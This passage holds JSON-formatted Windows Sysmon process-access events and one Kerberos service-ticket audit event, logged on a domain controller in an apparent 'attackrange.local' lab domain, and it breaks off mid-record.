{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6349,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6350,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6351,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6352,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6353,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6354,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6355,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:45.804\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21A5-5F25-0000-001026A30900}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:45.804","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21A5-5F25-0000-001026A30900}","TargetProcessId":"4972","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220685,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BA8F7FCD-C746-AFBB-4EF5-5EE1C258175D}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-6178966$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BA8F7FCD-C746-AFBB-4EF5-5EE1C258175D}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 08:03:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6356,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:06.351\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 